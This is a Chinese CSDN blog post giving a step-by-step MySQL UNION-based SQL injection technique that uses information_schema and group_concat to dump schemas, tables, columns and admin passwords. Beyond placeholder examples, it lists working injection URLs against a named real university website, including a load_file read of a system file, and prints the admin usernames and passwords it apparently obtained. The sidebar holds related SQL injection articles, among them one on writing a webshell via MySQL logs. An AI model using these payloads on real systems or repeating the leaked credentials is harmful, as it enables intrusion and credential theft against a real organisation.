慢注入mysql_Mysql注入高效率方法

最新推荐文章于 2023-02-27 23:38:54 发布
最新推荐文章于 2023-02-27 23:38:54 发布
阅读量191 收藏
点赞数
文章标签: MySQL注入 information_schema group_concat 数据库安全 SQL攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34463209/article/details/114018212
版权

此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似

但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人

优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入

缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...

下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示

在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ ,  + 等等

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17

读出所有库:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA

读出所有表:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()

读出所有表字段:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)

*/ (97,100,109,105,110)为admin的ascii码 依次类推

读出所有表字段里的内容:

http://www.xx.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin

http://www.sim.whu.edu.cn/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23

http://www.sim.whu.edu.cn/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23

http://www.sim.whu.edu.cn/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23

http://www.sim.whu.edu.cn/xuekedaohang/xkdh.php?ssort=1&&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23

webmaster:dzb521123,simlab:simadmin20043233

bug射击师
关注
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
这种方法不仅可以防止SQL注入,还可以高SQL语句的执行效率。 总的来说,mysql_real_escape_string、addslashes和mysql_bind_param都是PHP开发中常用的安全措施,可以有效地防止SQL注入攻击。但是,每种方法都有其...
SQL注入之时间延迟型注入
DM766924的博客
09-16 1546
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
SQL注入的几种类型和原理
最新发布
dzqxwzoe的博客
02-27 501
老实说,这篇笔记鸽了3个星期左右,有几个原因。漏洞点都要自己进行验证,比较缓最近工作上有点忙,下班无心学习我在摸鱼……。笔者学习是比较容易偏离方向,比如DNSlog盲注时抓包发现请求有点不合常理,又跑去找资料看……网络安全入门学习路线其实入门网络安全要学的东西不算多,也就是网络基础+操作系统+中间件+数据库,四个流程下来就差不多了。1.网络安全法和了解电脑基础其中包括操作系统Windows基础和Linux基础,标记语言HTML基础和代码JS基础,以及网络基础、数据库基础和虚拟机使用等...
逆袭之路——python 操作数据库、SQL注入问题、索引与查询优化【day49】
絵飛ヾ的魚的博客
05-09 732
今日内容概要 python操作MySQL SQL注入问题 修改表SQL语句补充 视图、触发器、存储过程 事务 流程控制、函数 索引与查询优化 今日内容详细 一、python操作MySQL python中支持操作MySQL的模块很多 其中最常见的当属pymysql 属于第三方模块 pip3 install pymysql 基本使用 import pymysql 链接服务端 conn_obj = pymysql.connect( host='127.0.0.1',
MySQL查询的全局分析
weixin_47184173的博客
05-31 251
我们常说的SQL优化是指什么 在尝试编写快速的查询之前,需要清楚一点,真正重要是响应时间。如果把查询看作是一个任务,那么它由一系列子任务组成,每个子任务都会消耗一定的时间。 所谓的优化查询,实际上意味着要优化其子任务。要么消除其中一些子任务,要 么减少子任务的执行次数,要么让子任务运行得更快。 MySQL 查询的生命周期大致可以按照顺序来看: 客户端->服务器->在服务器上进行解析->生成执行计划->执行->返回结果给客户端。 其中“执行” 可以认为是整个生命周期中最
常见sql注入方式
wusuopuBUPT的专栏
04-02 1万+
1.没有正确过滤转义字符   在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵。比方说,下面的这行代码就会演示这种漏洞:   statement := "SELECT* FROM users WHERE name = '" + userName + "';"   这种代码的设计目的是
mysql.rar_MYSQL_mysql c++_mysql sdk
09-24
MySQL是基于SQL标准的开源数据库,以其高性能、高可用性、易扩展性和开源特性而闻名。它支持多种操作系统,包括Windows、Linux、Unix等,并且能够处理大量数据,适用于Web应用、中小型企业以及大数据场景。 2. **...
mysql.rar_MYSQL_python_python mysql_python数据库
09-21
1. **预编译语句(Prepared Statements)**:可以防止SQL注入高执行效率,通过占位符(如%s)来代替具体的值。 2. **事务(Transactions)**:用于确保数据的一致性,支持ACID(原子性、一致性、隔离性、持久性...
mysql_wp.rar_linux mysql
09-24
7. **安全与性能优化**: 在Linux环境下,考虑到安全性和性能,开发者需要注意正确处理用户输入以防止SQL注入,优化查询以高执行效率,以及合理管理连接资源以避免资源浪费。 8. **版本兼容性**: 确保客户端程序与...
MySQL_Tools-master.rar_mysql c++
09-20
9. **性能优化**: 可能包含了一些优化策略,比如批量插入、预编译语句、结果集缓存等,以升与MySQL数据库交互的效率。 10. **元数据查询**: 工具集可能会供获取数据库表结构、索引、视图等元数据的功能,这对于...
常见的Web漏洞——SQL注入
热门推荐
江左盟的博客
06-25 12万+
目录 SQL注入简介 SQL注入原理 SQL注入分类及判断 SQL注入方法 联合查询注入 基于bool的盲注 基于时间的盲注 总结 SQL注入简介 SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。本文以免费开源数据库My...
注入mysql_Mysql监控日志,防止恶意用户注入
weixin_39543652的博客
01-20 102
#!/usr/bin/pythonimportreuserlist=['abc@192.168.1.1','cba@192.168.1.1']table=['table1','table2']SEEK_FILE='/tmp/seek.txt'MYSQL_LOG='/root/var/log/mysql/mysql_log.txt_2013-07-03_00'try:...
sql注入的N种方式
阿星的博客
06-22 4890
1. 介绍了sql注入的union注入、条件注入、堆叠注入、报错注入、时间盲注等方法以及如何进行防御。 2. 介绍了Burp Suite的简单使用
基本的四种SQL注入方式
qq_43635212的博客
08-30 1万+
目录联合注入基于错误的注入盲注延时注入 以sqli-labs less-1为例 构造 id=1 and 1=1或者id=1 and 1=2都能够正常查询出结果 构造 id=1’ 报错,说明是字符型注入 联合注入 当查询数据会返回显示界面时可以考虑使用union联合查询的方式 联合查询有两个必要条件: 两张虚拟表具有相同的列数 两张虚拟表对应列的数据类型相同 所以当一个地方可以使用联合查询时基本步骤为:猜测虚拟表列数-》获取数据库名-》获取表名-》获取列名-》获取数据 使用order by猜测列数 可
转:PHP中防止SQL注入方法
weixin_34258838的博客
10-08 780
【一、在服务器端配置】        安全,PHP代码编写是一方面,PHP的配置更是非常关键。我们php手手工安装的,php的默认配置文件在 /usr/local/apache2/conf/php.ini,我们最主要就是要配置php.ini中的内容,让我们执行 php能够更安全。整个PHP中的安全设置主要是为了防止phpshell和SQL Injection的攻击,一下我们探讨。我们先使用任...
mysql 写入_通过查询日志写入一句话木马
weixin_39724266的博客
12-21 599
微信搜一搜字母安全前你得知道账号密码整个基本思路是这样...1.首先通过注入、弱口令爆破、社会工程学...等等获取mysql数据库的用户名和密码2.通过相关渠道(探针文件...等等)获取mysql数据库的登录地址3.使用用户名和密码登陆mysql4.获取网站可写目录的绝对路径5.点击进入sql编辑器,输入上述代码,将一句话木马写入网站6.使用菜刀连接一句话木马1.登录phpMyAdm...
一些常见的SQL注入方法(联合注入 盲注 延时注入 sqlmap的使用)
joke_ljh的博客
06-02 6802
一些常见的SQL注入方法 一.联合注入 判断是否有注入点 ’ and 1=1–+ 猜列数 'order by 1–+ 一直猜到5报错,列数为4 猜库 'and 1=1改为and 1=2 'and 1=2 union select 1,2,3,4–+发现标题为2,内容为3,把2,3换成sql语句 'and 1=2 union select 1,user(),database(),4–+ ’ and ...
SQL注入的常见方式
LainWith的博客
10-09 7277
目录联合查询(union)函数介绍order byunion select操作布尔盲注 (and or)函数介绍mid 从中间截取字符left 从左开始截取字符ord、ascii 转成ascii码length 统计长度andregexp 正则注入-针对MySQL操作1. 猜数据库长度2. 猜数据库名 (配合BurpSuite)3. 猜表的个数4. 猜表5. 猜列6. 猜值延时注入(sleep if)函数操作1. 猜数据库长度2. 猜数据库名3. 猜表名4. 猜测 users 表的列5. 猜值宽字节注入引子
SQL注入详解,看这篇就够了
emprere的博客
02-13 1344
0前言先来看一副很有意思的漫画:相信大家对于学校们糟糕的网络环境和运维手段都早有体会,在此就不多做吐槽了。今天我们来聊一聊SQL注入相关的内容。1何谓SQL注入?SQL注入是一种非常...
批量注入MySQL测试脚本:高效创建50,000条数据
MySQL脚本是一种强大的数据库操作工具,用于批量注入大量数据到数据库中,特别是在测试场景中,其效率和实用性非常高。这个特定的脚本主要用于创建名为`test`的表,该表包含两个字段:`id`和`ordernum`。`id`字段是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值